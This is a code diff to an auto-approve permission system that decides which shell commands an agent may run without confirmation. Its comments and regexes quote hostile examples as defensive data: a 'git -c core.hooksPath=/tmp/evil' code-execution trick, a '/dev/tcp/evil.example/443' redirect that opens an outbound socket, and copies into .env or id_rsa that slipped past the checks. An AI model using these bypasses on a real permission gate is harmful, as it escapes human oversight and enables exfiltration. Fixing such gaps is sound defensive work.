     // no room for). That state is looked up BY SEGMENT INDEX from the single
     // walk done in the pre-pass, rather than re-tracked by a closure here —
     // see `RedirectGrantWalk`.
-    const vetoedByOwner = (owner: string, segment: string, prefix: string, index: number) => {
-      // The sensitive-destination axis is a GLOBAL conjunct, checked before any
-      // owner's own proof and never delegated to one. Found by the ADR 0023
-      // adversarial pass: the owner union below is disjunctive, so a prefix
-      // owned by both `fs-write` and `scratch` (`cp`, `mv`, `mkdir`, `touch`,
-      // `tee`) was approved the moment scratch's laxer proof held — and
-      // `scratchTargetVeto` never consulted `isSensitiveWritePath`. Measured
-      // develop -> this branch at BALANCED, a level this ADR does not even
-      // claim to touch:
-      //
-      //   cp /tmp/a /tmp/.env         develop: escalate -> branch: scratch:cp
-      //   mv /tmp/a /tmp/id_rsa       develop: escalate -> branch: scratch:mv
-      //   cp /tmp/a /tmp/.git/config  develop: escalate -> branch: scratch:cp
-      //
-      // It also falsified a shipped claim in `config.ts` ("the write groups
-      // refuse sensitive destinations regardless of prefix ... credentials
-      // (.env, id_rsa)"), which is exactly the ADR 0011 failure mode.
-      //
-      // Hoisting it here keeps the monotonicity the union was written for --
-      // adding a group cannot introduce a sensitive destination, so it still
-      // can only ADD approvals -- while restoring the property ADR 0010 wants:
-      // a deny-shaped check is broad, and must not be escapable by finding
-      // some OTHER owner whose positive proof happens to be laxer.
-      //
-      // Scoped to the MUTATING owners, not applied globally. A first cut
-      // applied it to every owner and broke three read tests
-      // (`jq .version package.json`, and two `/dev/null` redirect cases):
-      // `segmentTouchesSensitivePath` is a WRITE-side axis, and READING a
-      // sensitive path is exactly what `read-only` exists to allow.
-      if (MUTATING_GROUPS.has(owner) && segmentTouchesSensitivePath(segment)) return true;
-      if (owner === 'scratch') {
-        return scratchTargetVeto(segment, redirectGrants?.stateBySegment[index]?.scratch ?? null);
-      }
-      if (owner === 'artifact-clean') {
-        return artifactCleanVeto(segment, prefix, artifactPoison?.[index] ?? true);
-      }
-      const veto = BUILTIN_GROUPS[owner]?.segmentVeto ?? readSegmentVeto;
-      return veto(segment);
-    };
+    const vetoedByOwner = vetoedByOwnerFor(redirectGrants, artifactPoison);
     // The owner whose proof passed for the FIRST matched segment — the
     // segment whose prefix `matchCoveredCommand` returns — so the label
     // names the group that actually approved it, not the first registrant.
@@ -1960,6 +1979,138 @@ export function matchGroups(
     return `${name}:${toolName}`;
   }
   return null;
+}
+
+/** One `matchComposedCommand` verdict: the first allow-owned and first
+ *  group-owned prefix that contributed to covering the command, so the
+ *  caller's reasoning string can name one prefix from EACH source (proof
+ *  that the union, not either source alone, is what covered it). Either
+ *  field is null when that source contributed no segment at all — the
+ *  degenerate case exercised by an empty `allowPrefixes` or empty
+ *  `groupNames` (see the function doc). */
+export interface ComposedMatch {
+  readonly allowHit: string | null;
+  readonly groupHit: string | null;
+}
+
+/**
+ * Match a Bash command against the UNION of the user's own `allow` command
+ * prefixes and the enabled permission groups (#1057 phase 3, commit 1).
+ *
+ * `matchAllowPattern` and `matchGroups` each run their OWN independent
+ * `matchCoveredCommand` walk, and each demands EVERY segment be covered by
+ * ITS OWN source alone. A chain whose segments are covered only by the UNION
+ * of the two fails both walks even though a human reading the config would
+ * call it obviously covered:
+ *
+ *     ssh hallu nvidia-smi | head -2     allow=["ssh hallu"]; head in read-only
+ *     uv run pytest | tail -5            allow=["uv run"]; tail in read-only
+ *
+ * This runs ONE `matchCoveredCommand` walk over the union of prefixes instead,
+ * so `ssh hallu` and `head` can each cover their own segment in the same pass.
+ * `evaluateDeterministic` calls this ONLY after both `matchAllowPattern` and
+ * `matchGroups` have already missed on the SAME command — see that method's
+ * doc for why the ordering matters (unchanged reasoning strings, and outcomes,
+ * for every single-source chain).
+ *
+ * Composition never widens what either source alone would approve for a
+ * segment it matches:
+ *
+ *   - A segment whose matched prefix is owned ONLY by `allow` gets exactly
+ *     `matchAllowPattern`'s treatment — no group veto is layered on top. The
+ *     exec-primitive rule (`hasExecPrimitive(seg) && !hasExecPrimitive(hit)`)
+ *     still applies, because `matchCoveredCommand` runs it unconditionally
+ *     after any `vetoForMatched` verdict, allow included.
+ *   - A segment whose matched prefix is owned by a GROUP gets `matchGroups`'s
+ *     own `vetoedByOwnerFor` dispatch, unchanged (sensitive-path conjunct,
+ *     `segmentVeto`, the scratch/artifact-clean per-index state walks).
+ *   - A prefix owned by BOTH sources approves the segment when EITHER
+ *     source's veto passes — the same first-passing-owner disjunction
+ *     `matchGroups` already uses across multiple group owners, with "allow"
+ *     simply added as one more candidate owner.
+ *
+ * The ADR 0026 pre-passes (heredoc excision, redirect grants) run exactly as
+ * they do in `matchGroups`: heredoc excision unconditionally, redirect grants
+ * gated on `scratch`/`fs-write` GROUP membership only. Allow membership never
+ * extends that gate — `allow = ["python3"]` with no `fs-write` group must NOT
+ * make a redirect grant available that group membership alone would not have
+ * granted; see the paired test for the positive case (both active, and the
+ * grant composes with an allow-covered head).
+ */
+export function matchComposedCommand(
+  command: string,
+  allowPrefixes: readonly string[],
+  groupNames: readonly string[],
+): ComposedMatch | null {
+  const trimmed = command.trim();
+  if (trimmed === '') return null;
+  // Tool-name-shaped entries say nothing about shell commands (same filter
+  // `matchAllowPattern` applies) -- dropping them here is what stops
+  // `allow = ['Read']` from feeding "Read" into the union as a command prefix.
+  const commandAllowPrefixes = allowPrefixes.filter((p) => p.length > 0 && !looksLikeToolName(p));
+  const known = groupNames.filter(isKnownGroup);
+  if (commandAllowPrefixes.length === 0 && known.length === 0) return null;
+
+  // Same pre-passes as `matchGroups`, same gating (group membership only --
+  // see the function doc for why allow membership must never extend it).
+  const heredocExcised = exciseHeredocsForGroups(trimmed);
+  const scratchActive = known.includes('scratch');
+  const fsWriteActive = known.includes('fs-write');
+  const redirectGrants =
+    scratchActive || fsWriteActive
+      ? sanitizeCommandForRedirectGrants(heredocExcised, { scratchActive, fsWriteActive })
+      : null;
+  const sanitized = redirectGrants?.command ?? heredocExcised;
+  const artifactPoison = known.includes('artifact-clean')
+    ? artifactCleanPoisonWalk(sanitized)
+    : null;
+
+  // Map each prefix to every owning source, in request order, `allow` first.
+  // A prefix present in both an allow entry and a group's command list keeps
+  // BOTH owners, exactly like `matchGroups` already does for a prefix two
+  // groups both list.
+  const prefixOwners = new Map<string, string[]>();
+  for (const p of commandAllowPrefixes) {
+    const owners = prefixOwners.get(p);
+    if (owners === undefined) prefixOwners.set(p, ['allow']);
+    else if (!owners.includes('allow')) owners.push('allow');
+  }
+  for (const name of known) {
+    for (const cmd of BUILTIN_GROUPS[name]?.commands ?? []) {
+      const owners = prefixOwners.get(cmd);
+      if (owners === undefined) prefixOwners.set(cmd, [name]);
+      else if (!owners.includes(name)) owners.push(name);
+    }
+  }
+
+  const groupVeto = vetoedByOwnerFor(redirectGrants, artifactPoison);
+  let allowHit: string | null = null;
+  let groupHit: string | null = null;
+  const hit = matchCoveredCommand(
+    sanitized,
+    [...prefixOwners.keys()],
+    readSegmentVeto,
+    (segment, matchedPrefix, index) => {
+      for (const owner of prefixOwners.get(matchedPrefix) ?? []) {
+        // `allow` carries no group veto of its own -- the allow path's only
+        // per-segment check is the exec-primitive rule, and
+        // `matchCoveredCommand` already applies that unconditionally after
+        // this callback returns, allow-owned or not.
+        const vetoed = owner === 'allow' ? false : groupVeto(owner, segment, matchedPrefix, index);
+        if (!vetoed) {
+          if (owner === 'allow') {
+            if (allowHit === null) allowHit = matchedPrefix;
+          } else if (groupHit === null) {
+            groupHit = matchedPrefix;
+          }
+          return false;
+        }
+      }
+      return true;
+    },
+  );
+  if (hit === null) return null;
+  return { allowHit, groupHit };
 }
 
 /**

--- a/packages/daemon/src/auto-approve/permission-groups.ts
+++ b/packages/daemon/src/auto-approve/permission-groups.ts
@@ -18,9 +18,19 @@
  *    of those tokens legitimately appears in a curated read command, so the
  *    veto can only catch a write that slipped past a read prefix.
  *  - Commands whose read form can be flipped to a write by an AMBIGUOUS short
- *    flag (`sort -o`, `find -delete`, `awk` system(), `gh api -X`) are
- *    intentionally EXCLUDED from the curated set. Users can add them via the
- *    `allow` list at their own discretion (per-segment prefix, not substring).
+ *    flag are EXCLUDED from the curated set whenever no veto already closes
+ *    that specific flag: `sort -o`, `gh api -X`. `find -delete` and `awk`
+ *    system()/pipe-to-shell are the opposite shape (#1057 phase 3, commit 3)
+ *    — the bare command IS curated, because `shell-safety.ts`'s
+ *    `hasExecPrimitive` already refuses exactly the dangerous forms
+ *    (`EXEC_PRIMITIVE_TOKEN` for `-delete`/`-exec`/..., `EXEC_SCOPED_VETOES`
+ *    for awk's `system()`/pipe-to-shell), consulted by `matchCoveredCommand`
+ *    for every matched segment regardless of which group owns the prefix.
+ *    `sort -o` has no such veto and stays excluded; the two are not
+ *    interchangeable, and a future addition must check which shape it is
+ *    before assuming either precedent applies. Users can add an excluded
+ *    command via the `allow` list at their own discretion (per-segment
+ *    prefix, not substring).
  *  - Non-Bash tools match by bare tool name.
  *
  * The segment splitter and shell-control veto live in `shell-safety.ts`; the
@@ -1556,6 +1566,27 @@ export const BUILTIN_GROUPS: Readonly<Record<string, PermissionGroup>> = {
       'mdfind',
       'du',
       'df',
+      // #1057 phase 3 commit 3: evidence-based additions from the #996/#999
+      // corpora. `awk` and `find` each have a read form flippable to code
+      // execution / deletion by a flag or program body this list cannot see
+      // by name alone -- but BOTH already have a veto that fires on exactly
+      // that shape for EVERY matched segment, regardless of which curated
+      // prefix matched it: `awk` via `EXEC_SCOPED_VETOES`'s system()/
+      // pipe-to-shell entry, `find` via `EXEC_PRIMITIVE_TOKEN`'s
+      // `-delete`/`-exec`/`-execdir`/`-ok`/`-okdir`/`-fprint*`/`-fls` entries
+      // (both shell-safety.ts, consulted by `matchCoveredCommand`
+      // unconditionally). So, unlike `sort -o` (still excluded above: no such
+      // veto exists for it), the bare command name is safe to curate here.
+      'awk',
+      'find',
+      // Pure text/stream transforms verified to carry no destination-writing
+      // flag on either BSD or GNU builds: stdin/stdout (or their file
+      // operands, read-only) only.
+      'tr',
+      'comm',
+      'paste',
+      'nl',
+      'rev',
     ],
   },
   'vcs-read': {
@@ -1574,6 +1605,12 @@ export const BUILTIN_GROUPS: Readonly<Record<string, PermissionGroup>> = {
       'git show-ref',
       'git for-each-ref',
       'git shortlog',
+      // #1057 phase 3 commit 3: a remote READ. `git fetch` updates
+      // remote-tracking refs (`origin/main`, ...) from the remote; it never
+      // touches the working tree or the current branch -- that is `git
+      // merge`/`git pull`'s job, not fetch's. `git push` (the write half of
+      // remote sync) stays excluded at every level, unaffected by this.
+      'git fetch',
       // `git reflog` alone exposes `git reflog expire|delete` (history loss);
       // pin to the read-only subcommands.
       'git reflog show',
@@ -1694,6 +1731,12 @@ export const BUILTIN_GROUPS: Readonly<Record<string, PermissionGroup>> = {
       'git checkout',
       'git switch',
       'git merge',
+      // #1057 phase 3 commit 3: remote read (`git fetch`) + local merge into
+      // the current branch -- the write half is entirely local, exactly what
+      // this group already covers via `git merge` on its own. `git push`
+      // (the actual remote MUTATION) stays excluded at every level below,
+      // untouched by this addition.
+      'git pull',
       // #972: bare, not `git stash push`. `git stash` with no subcommand IS
       // push (git's own default), and `git stash pop` restores — both purely
       // local, both what this group exists to cover, and both were escalating

--- a/packages/daemon/src/auto-approve/risk-bands.ts
+++ b/packages/daemon/src/auto-approve/risk-bands.ts
@@ -95,10 +95,13 @@
  *    and allow-list matchers) is reused as-is for `find -exec`,
  *    `git -c core.hooksPath=`, `awk 'system(...)'` and the rest of that
  *    family — not reimplemented.
- * 6. `gitSubcommandIndex`/`ghTopIndex` walk past a RECOGNISED global flag
- *    (`git --no-pager`, `gh --repo x/y`, ...) to find the actual subcommand,
- *    the same walk `unwrapCommand` already does for wrapper flags — replacing
- *    the fixed `words[1]`/`words[2]` indexing that broke on one.
+ * 6. `gitSubcommandIndex`/`ghTopIndex` (shell-safety.ts, moved there in #1057
+ *    phase 3 commit 4 so `hasExecPrimitive`'s own git `-c` veto can share the
+ *    same walk rather than a second one that could disagree — #962) walk past
+ *    a RECOGNISED global flag (`git --no-pager`, `gh --repo x/y`, ...) to find
+ *    the actual subcommand, the same walk `unwrapCommand` already does for
+ *    wrapper flags — replacing the fixed `words[1]`/`words[2]` indexing that
+ *    broke on one.
  *
  * (3) and (4) both recurse through `classifyCommandMax`/`classifySegmentBand`
  * with a bounded depth (`MAX_RECURSION_DEPTH`) so a maliciously (or just
@@ -109,7 +112,13 @@
 import { extractToolCommand } from './command-tools.ts';
 import { matchesCatastrophicPattern } from './deny-floor.ts';
 import { isSensitiveWritePath, segmentTouchesSensitivePath } from './sensitive-paths.ts';
-import { hasExecPrimitive, shellWords, splitCompound } from './shell-safety.ts';
+import {
+  ghTopIndex,
+  gitSubcommandIndex,
+  hasExecPrimitive,
+  shellWords,
+  splitCompound,
+} from './shell-safety.ts';
 
 export const RISK_BANDS = ['low', 'moderate', 'high', 'critical'] as const;
 
@@ -528,58 +537,6 @@ function isPackageInstall(words: readonly string[]): boolean {
     return false;
   }
   return PACKAGE_INSTALL_SUBCOMMANDS[bin]?.includes(sub) ?? false;
-}
-
-/**
- * Walk `words` from `fromIndex`, skipping recognised flags (and, for a flag
- * in `valueFlags`, its separate value token too), and return the index of
- * the first non-flag token found — the actual subcommand once global flags
- * are skipped past. Returns -1 if every remaining token is a flag.
- *
- * The same walk `unwrapCommand` already does for wrapper flags, reused here
- * to fix a DIFFERENT bug: `words[1] === 'push'`-style fixed-index checks
- * silently miss the subcommand when an intervening global flag shifts it
- * (`git --no-pager push`, `gh --repo x/y pr merge`) — not a wrapper hiding a
- * command, just an ordinary flag nobody accounted for.
- */
-function skipFlags(
-  words: readonly string[],
-  fromIndex: number,
-  valueFlags: ReadonlySet<string>,
-): number {
-  let i = fromIndex;
-  while (i < words.length) {
-    const token = words[i] ?? '';
-    if (!token.startsWith('-')) return i;
-    i++;
-    if (valueFlags.has(token)) i++;
-  }
-  return -1;
-}
-
-/** Global git flags that take a separate value token (not exhaustive — see `skipFlags`'s doc). */
-const GIT_GLOBAL_VALUE_FLAGS: ReadonlySet<string> = new Set([
-  '-C',
-  '--git-dir',
-  '--work-tree',
-  '--namespace',
-  '--super-prefix',
-  '--exec-path',
-]);
-
-/** Index of `git`'s subcommand (`push`, `status`, ...), skipping global flags, or -1. */
-function gitSubcommandIndex(words: readonly string[]): number {
-  if (words[0] !== 'git') return -1;
-  return skipFlags(words, 1, GIT_GLOBAL_VALUE_FLAGS);
-}
-
-/** Global gh flags that take a separate value token. */
-const GH_GLOBAL_VALUE_FLAGS: ReadonlySet<string> = new Set(['--repo', '-R', '--hostname']);
-
-/** Index of `gh`'s top-level subcommand (`pr`, `issue`, `api`, ...), skipping global flags, or -1. */
-function ghTopIndex(words: readonly string[]): number {
-  if (words[0] !== 'gh') return -1;
-  return skipFlags(words, 1, GH_GLOBAL_VALUE_FLAGS);
 }
 
 /**

--- a/packages/daemon/src/auto-approve/shell-safety.ts
+++ b/packages/daemon/src/auto-approve/shell-safety.ts
@@ -13,8 +13,23 @@
  * `extraVeto` hook of `matchCoveredCommand`.
  */
 
-/** Benign segments that may appear in a compound command without needing coverage. */
-export const NEUTRAL_PREFIXES: readonly string[] = ['cd', 'pwd', 'true', 'echo', ':'];
+/**
+ * Benign segments that may appear in a compound command without needing
+ * coverage.
+ *
+ * `read` (#1057 phase 3, commit 2) is a bash BUILTIN that assigns stdin to
+ * shell variables and executes nothing of its own -- its flags (`-r`, `-p`,
+ * `-a`, `-e`, ...) only change how it parses stdin, none of them run a
+ * command. It is the loop-header half of the `while read l; do ...; done`
+ * idiom (#999 already peels `while`/`do`/`done`), and before this addition
+ * the `read l` segment itself matched no prefix and had no path to being
+ * judged benign, so a body the rest of this module would otherwise cover
+ * (`grep`, `cat`, ...) still escalated on the header segment alone. Neutral,
+ * not a matched prefix: a command of ONLY neutral segments still matches
+ * nothing (`matchCoveredCommand` requires at least one real hit), so bare
+ * `read` alone stays uncovered by design -- see the paired test.
+ */
+export const NEUTRAL_PREFIXES: readonly string[] = ['cd', 'pwd', 'true', 'echo', ':', 'read'];
 
 /*
  * ATTEMPT 5, REVERTED BEFORE MERGE: "a segment whose every word is an
@@ -155,6 +170,73 @@ const CASE_HEADER_RE = /^case\s+\S+\s+in$/;
 /** `break`/`continue` take an optional LEVEL COUNT, never a command. */
 const LOOP_CONTROL_RE = /^(?:break|continue)(?:\s+\d+)?$/;
 
+/**
+ * Characters a bare input-redirect PATH may contain once proven free of
+ * expansion: letters, digits, `_ . / ~ -`. No `$`, no quotes -- either would
+ * mean the shell rewrites the token before this text is what actually gets
+ * opened, and `isPlainInputRedirectResidue` runs on RAW residue text (no
+ * quote-masking has happened by this point), so a quote character has to be
+ * refused rather than trusted to bound a literal.
+ */
+const INPUT_REDIRECT_PATH_RE = /^[A-Za-z0-9_./~-]+$/;
+
+/**
+ * One input-redirect clause inside a peeled residue: `< PATH` or `<<< WORD`
+ * (a here-string). `<<<` is tried before the single-`<` alternative so a
+ * here-string is never misread as a file redirect whose target happens to
+ * start with `<`.
+ */
+const RESIDUE_REDIRECT_CLAUSE_RE = /(<<<|<)\s*(\S+)/g;
+
+/**
+ * True if `rest` -- a `stripShellGrammar` peel residue -- consists SOLELY of
+ * one or more plain input-redirect clauses, each provably free of expansion:
+ * `< f`, `< ./data.txt`, `<<< abc`, or several of these in a row.
+ *
+ * Why this is safe to treat as structural exactly like an empty residue: the
+ * terminator or header this residue trails (`done`, `fi`, ...) already runs
+ * no command of its own -- that is the entire premise `stripShellGrammar`
+ * rests on -- and a bare input redirect on that same segment does not add
+ * one either. It only rebinds the compound's stdin to a file the shell opens
+ * for reading; nothing here runs, writes, or executes anything.
+ *
+ * Deliberately conservative, matching this module's established idiom of
+ * removing only what is PROVEN inert and leaving everything else visible so
+ * it still fails closed:
+ *
+ *   - a target containing `$` is refused -- expansion means this text is not
+ *     what the shell will actually open;
+ *   - a quoted target (`< "f"`) is refused -- this function runs on RAW text,
+ *     so a quote character is not provably a literal delimiter here, only a
+ *     character this recognizer does not understand;
+ *   - `<(...)` process substitution is refused by construction: its target
+ *     starts with `(`, outside both character classes below, and it is
+ *     independently vetoed by `hasShellControl` on the UNPEELED segment
+ *     regardless (that check runs before `stripShellGrammar` is ever called
+ *     -- see `matchCoveredCommand`), so this function does not need to, and
+ *     must not, weaken that.
+ *
+ * Any gap between clauses that is not pure whitespace, or any trailing text
+ * after the last clause, fails the whole residue: a redirect clause is not
+ * ALL the residue contains, so nothing here is safe to wave through
+ * unexamined.
+ */
+function isPlainInputRedirectResidue(rest: string): boolean {
+  if (rest === '') return false;
+  const matches = [...rest.matchAll(RESIDUE_REDIRECT_CLAUSE_RE)];
+  if (matches.length === 0) return false;
+  let consumed = 0;
+  for (const match of matches) {
+    if (rest.slice(consumed, match.index).trim() !== '') return false;
+    const [whole, op, target] = match;
+    if (target === undefined) return false;
+    const targetOk = op === '<<<' ? !/[$`(\s]/.test(target) : INPUT_REDIRECT_PATH_RE.test(target);
+    if (!targetOk) return false;
+    consumed = match.index + whole.length;
+  }
+  return rest.slice(consumed).trim() === '';
+}
+
 /** A segment reduced to the command it actually runs, if any. */
 export interface StrippedSegment {
   /** What remains once leading grammar keywords are removed. */
@@ -193,6 +275,16 @@ export function stripShellGrammar(segment: string): StrippedSegment {
     if (FOR_HEADER_RE.test(rest) || CASE_HEADER_RE.test(rest) || LOOP_CONTROL_RE.test(rest)) {
       return { command: '', structural: true };
     }
+  }
+  // #1057 phase 3, commit 2: a residue that is SOLELY a plain input-redirect
+  // clause (`done < f`, `fi <<< abc`) trails a terminator/header that already
+  // runs no command -- see `isPlainInputRedirectResidue` for why rebinding
+  // stdin does not change that. Checked once, here, after every keyword has
+  // been peeled (including stacked ones), rather than inside the loop: a
+  // redirect clause never itself matches `GRAMMAR_PREFIX_KEYWORDS`, so it can
+  // only ever be reached as the loop's final residue.
+  if (isPlainInputRedirectResidue(rest)) {
+    return { command: '', structural: true };
   }
   return { command: rest, structural: rest === '' };
 }

--- a/packages/daemon/src/auto-approve/shell-safety.ts
+++ b/packages/daemon/src/auto-approve/shell-safety.ts
@@ -741,14 +741,116 @@ const EXEC_PRIMITIVE_TOKEN =
   /(^|\s)(-exec|-execdir|-ok|-okdir|-delete|-fprintf|-fprint|-fprint0|-fls|--to-command|--use-compress-program|--rmt-command|--rsh-command|--checkpoint-action|--preload|--require|--eval|--exec)(\s|=|$)/;
 
 /**
+ * Walk `words` from `fromIndex`, skipping recognised flags (and, for a flag
+ * in `valueFlags`, its separate value token too), and return the index of
+ * the first non-flag token found — the actual subcommand once global flags
+ * are skipped past. Returns -1 if every remaining token is a flag.
+ *
+ * Moved here from `risk-bands.ts` (#1057 phase 3, commit 4) so
+ * `hasExecPrimitive`'s git `-c` veto (below) can share the SAME subcommand
+ * walk `risk-bands.ts` already uses for its own git/gh checks, rather than a
+ * second one that could disagree with it (#1000's law: two walks of the same
+ * question must never be able to drift). This module cannot import FROM
+ * `risk-bands.ts` — that module already imports `hasExecPrimitive` and
+ * friends from here, and the reverse would be a cycle — so the shared
+ * primitive lives on this side and `risk-bands.ts` imports it back.
+ */
+export function skipFlags(
+  words: readonly string[],
+  fromIndex: number,
+  valueFlags: ReadonlySet<string>,
+): number {
+  let i = fromIndex;
+  while (i < words.length) {
+    const token = words[i] ?? '';
+    if (!token.startsWith('-')) return i;
+    i++;
+    if (valueFlags.has(token)) i++;
+  }
+  return -1;
+}
+
+/** Global git flags that take a separate value token (not exhaustive — see `skipFlags`'s doc). */
+export const GIT_GLOBAL_VALUE_FLAGS: ReadonlySet<string> = new Set([
+  '-C',
+  '--git-dir',
+  '--work-tree',
+  '--namespace',
+  '--super-prefix',
+  '--exec-path',
+]);
+
+/** Index of `git`'s subcommand (`push`, `status`, ...), skipping global flags, or -1. */
+export function gitSubcommandIndex(words: readonly string[]): number {
+  if (words[0] !== 'git') return -1;
+  return skipFlags(words, 1, GIT_GLOBAL_VALUE_FLAGS);
+}
+
+/** Global gh flags that take a separate value token. */
+const GH_GLOBAL_VALUE_FLAGS: ReadonlySet<string> = new Set(['--repo', '-R', '--hostname']);
+
+/** Index of `gh`'s top-level subcommand (`pr`, `issue`, `api`, ...), skipping global flags, or -1. */
+export function ghTopIndex(words: readonly string[]): number {
+  if (words[0] !== 'gh') return -1;
+  return skipFlags(words, 1, GH_GLOBAL_VALUE_FLAGS);
+}
+
+/**
+ * `git -c <key>=<value> <subcommand>` runs arbitrary code (`core.hooksPath`,
+ * `core.fsmonitor`, ...) before the subcommand ever starts. `git switch -c
+ * <name>` and `git commit -c <commit>` reuse the SAME letter for an entirely
+ * unrelated, harmless, SUBCOMMAND-level flag (#962). A raw-text regex cannot
+ * tell those apart from presence alone — `EXEC_SCOPED_VETOES`'s uniform
+ * `(family, flag-regex)` shape below is exactly that, presence-only — so git
+ * is the one family that needs a token walk instead of an entry in that list,
+ * scoped by `gitSubcommandIndex` (shared with `risk-bands.ts`, never a second
+ * independent derivation of "where is the subcommand").
+ *
+ * git's own parser draws the identical line: a global option like `-c` is
+ * only recognised BEFORE the first non-option argument (the subcommand);
+ * everything from there on belongs to the subcommand's own parser, which may
+ * give the same letter a completely different meaning, or none at all. So a
+ * `-c` strictly before `gitSubcommandIndex` — or anywhere at all when no
+ * subcommand token exists (an all-flags command, including a bare trailing
+ * `git -c`, where `gitSubcommandIndex` returns -1) — is the exec primitive;
+ * a `-c` at or after it is not, REGARDLESS of whether that particular
+ * subcommand happens to define `-c` for itself. (`git worktree add`, for
+ * instance, has no `-c` of its own — verified via `git worktree add -h` — so
+ * `-c` there is simply an invalid option git will reject at parse time; that
+ * is a usability non-event, not a bypass, because git never reaches the
+ * global config-injection code path for a flag positioned after the
+ * subcommand it already committed to.)
+ *
+ * A token "carries" `-c` when it is: the standalone token `-c`; a
+ * `=`-attached `-c=value` (real git takes the value as a SEPARATE token, but
+ * matching the glued spelling too costs nothing and errs the safe direction,
+ * ADR 0010); or `c` bundled into a short-option cluster with other
+ * single-dash letters (`-uc`). Over-matching a shape git would itself reject
+ * is fine — this function only ever REFUSES on a match, so a false positive
+ * costs an extra escalation, never a wrongly-approved command.
+ */
+function hasPreSubcommandGitDashC(segment: string): boolean {
+  if (!/^git\b/.test(segment)) return false;
+  const words = shellWords(segment);
+  const subIdx = gitSubcommandIndex(words);
+  const end = subIdx === -1 ? words.length : subIdx;
+  for (let i = 1; i < end; i++) {
+    const token = words[i] ?? '';
+    if (token === '-c' || token.startsWith('-c=')) return true;
+    if (/^-[A-Za-z]+$/.test(token) && token.includes('c')) return true;
+  }
+  return false;
+}
+
+/**
  * Command families whose read form is flipped to code execution by a flag that
  * is harmless elsewhere, so the veto has to know which command it is looking at.
+ *
+ * git is deliberately NOT an entry here (#962) — see `hasPreSubcommandGitDashC`
+ * above for why it alone needs token position rather than a raw-text regex.
+ * Every other family keeps the original presence-only shape.
  */
 const EXEC_SCOPED_VETOES: ReadonlyArray<{ family: RegExp; flag: RegExp }> = [
-  // `git -c core.hooksPath=/tmp/evil status` and `git -c core.fsmonitor='...'`
-  // run arbitrary code on an otherwise read-only git command. No read form of
-  // git needs `-c`.
-  { family: /^git\b/, flag: /(^|\s)-c(\s|=)/ },
   // awk's program text can call system() or pipe into a shell.
   { family: /^(g|m|n)?awk\b/, flag: /(system\s*\(|\|\s*&?\s*"?\s*(sh|bash|zsh)\b|print\s*\|)/ },
   // `rsync -e 'sh -c ...'` / `--rsh` runs the "remote shell" locally.
@@ -761,6 +863,7 @@ const EXEC_SCOPED_VETOES: ReadonlyArray<{ family: RegExp; flag: RegExp }> = [
 /** True if a segment carries a code-execution primitive. */
 export function hasExecPrimitive(segment: string): boolean {
   if (EXEC_PRIMITIVE_TOKEN.test(segment)) return true;
+  if (hasPreSubcommandGitDashC(segment)) return true;
   for (const { family, flag } of EXEC_SCOPED_VETOES) {
     if (family.test(segment) && flag.test(segment)) return true;
   }

--- a/packages/daemon/src/auto-approve/shell-safety.ts
+++ b/packages/daemon/src/auto-approve/shell-safety.ts
@@ -195,6 +195,24 @@ const LOOP_CONTROL_RE = /^(?:break|continue)(?:\s+\d+)?$/;
 const INPUT_REDIRECT_PATH_RE = /^[A-Za-z0-9_./~-]+$/;
 
 /**
+ * bash's virtual network-socket device paths: `< /dev/tcp/host/port` and
+ * `< /dev/udp/host/port` do not open a file at all -- bash special-cases
+ * these two spellings to open a TCP/UDP socket to `host:port` instead
+ * (bash(1), "Redirecting Input and Output" / "/dev/tcp/host/port"). Every
+ * character in `/dev/tcp/evil.example/443` is inside
+ * `INPUT_REDIRECT_PATH_RE`'s allowed set, so without this check the target
+ * looked exactly as "provably a plain file path" as `/dev/null` or
+ * `data.txt` to `isPlainInputRedirectResidue`, and `while read l; do cat $l;
+ * done < /dev/tcp/evil.example/443` was treated as pure inert grammar
+ * residue and waved through -- a live outbound network connection opened by
+ * a `while`/`done` loop header this module exists to prove runs nothing
+ * (#1062 C6, CONFIRMED). `/dev/null`, `/dev/stdin`, `/dev/fd/N` and every
+ * other `/dev/...` path are unaffected: this refuses exactly the two
+ * `tcp`/`udp` device names bash special-cases, nothing else under `/dev`.
+ */
+const NETWORK_DEV_PATH_RE = /^\/dev\/(tcp|udp)\//;
+
+/**
  * One input-redirect clause inside a peeled residue: `< PATH` or `<<< WORD`
  * (a here-string). `<<<` is tried before the single-`<` alternative so a
  * here-string is never misread as a file redirect whose target happens to
@@ -229,6 +247,11 @@ const RESIDUE_REDIRECT_CLAUSE_RE = /(<<<|<)\s*(\S+)/g;
  *     regardless (that check runs before `stripShellGrammar` is ever called
  *     -- see `matchCoveredCommand`), so this function does not need to, and
  *     must not, weaken that.
+ *   - a `<` (not `<<<`) target under `/dev/tcp/` or `/dev/udp/` is refused
+ *     (#1062 C6) even though it is otherwise a syntactically plain path:
+ *     bash opens these two as a network socket, not a file -- see
+ *     `NETWORK_DEV_PATH_RE`'s doc for the mechanism. A `<<<` here-string
+ *     target is unaffected; it never opens its "target" as a path at all.
  *
  * Any gap between clauses that is not pure whitespace, or any trailing text
  * after the last clause, fails the whole residue: a redirect clause is not
@@ -244,7 +267,10 @@ function isPlainInputRedirectResidue(rest: string): boolean {
     if (rest.slice(consumed, match.index).trim() !== '') return false;
     const [whole, op, target] = match;
     if (target === undefined) return false;
-    const targetOk = op === '<<<' ? !/[$`(\s]/.test(target) : INPUT_REDIRECT_PATH_RE.test(target);
+    const targetOk =
+      op === '<<<'
+        ? !/[$`(\s]/.test(target)
+        : INPUT_REDIRECT_PATH_RE.test(target) && !NETWORK_DEV_PATH_RE.test(target);
     if (!targetOk) return false;
     consumed = match.index + whole.length;
   }

--- a/packages/daemon/src/auto-approve/shell-safety.ts
+++ b/packages/daemon/src/auto-approve/shell-safety.ts
@@ -28,8 +28,22 @@
  * not a matched prefix: a command of ONLY neutral segments still matches
  * nothing (`matchCoveredCommand` requires at least one real hit), so bare
  * `read` alone stays uncovered by design -- see the paired test.
+ *
+ * `printf` (#1057 phase 3, commit 3) is the same inert class as `echo`: it
+ * writes only to stdout, takes no destination flag, and executes nothing of
+ * its own. Added after the #996 corpus showed a `for`-loop header using it
+ * purely for formatted progress text (`printf "obs #%s: " $p`) sinking an
+ * otherwise-covered read segment in the same loop body.
  */
-export const NEUTRAL_PREFIXES: readonly string[] = ['cd', 'pwd', 'true', 'echo', ':', 'read'];
+export const NEUTRAL_PREFIXES: readonly string[] = [
+  'cd',
+  'pwd',
+  'true',
+  'echo',
+  ':',
+  'read',
+  'printf',
+];
 
 /*
  * ATTEMPT 5, REVERTED BEFORE MERGE: "a segment whose every word is an

--- a/packages/daemon/src/auto-approve/write-flag-safety.ts
+++ b/packages/daemon/src/auto-approve/write-flag-safety.ts
